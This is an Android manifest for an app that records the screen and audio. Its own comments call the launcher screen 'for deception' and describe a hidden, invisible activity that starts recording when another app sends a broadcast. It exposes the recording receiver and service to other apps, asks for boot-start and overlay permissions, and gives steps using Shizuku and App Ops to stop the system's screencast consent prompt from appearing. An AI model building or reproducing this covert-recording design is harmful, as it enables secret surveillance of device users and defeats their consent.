<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.ivok.broadcasttest">

    <!--Required permissions for recording the screen and saving the recording-->
    <!--
        NOTE!: IN ANDROID 9 AND HIGHER IS NEEDED TO INSTALL "App Ops" & "Shizuku".
        BECAUSE IT WILL POP A WINDOW, ASKING FOR SCREENCASTING EVERY TIME A RECORDING IS STARTED!
        Use "adb shell" to execute the script in "Shizuku". Using "Shizuku" authorize "App Ops".
        Open "App Ops" and click on "Shizuku mode". Then find this application and toggle "Screen projection"
        to "Allow". This permission is hidden if no recording has been started by this application.
    -->
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.WRITE_INTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />

    <application
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:requestLegacyExternalStorage="true">

        <!--This Activity is hidden - "pops" out when broadcast message is received-->
        <activity
            android:name=".RequestRecordingActivity"
            android:theme="@android:style/Theme.NoDisplay" />
        <!--This Activity is for deception-->
        <activity
            android:name=".MainActivity"
            android:screenOrientation="portrait"
            android:theme="@style/Theme.AppCompat.Light.NoActionBar">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <!--The BroadcastReceiver responsible for hadnling(start/stop) the recording service-->
        <receiver
            android:name=".StartStopMessageBroadcastReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="com.ivok.START_SERVICE" />
                <action android:name="com.ivok.STOP_SERVICE" />
            </intent-filter>
        </receiver>

        <!--The Service that is used to maintain recording till the Service is stopped-->
        <service
            android:name=".RecordingService"
            android:enabled="true"
            android:exported="true"
            android:foregroundServiceType="mediaProjection"
            android:requestLegacyExternalStorage="true" />

    </application>

</manifest>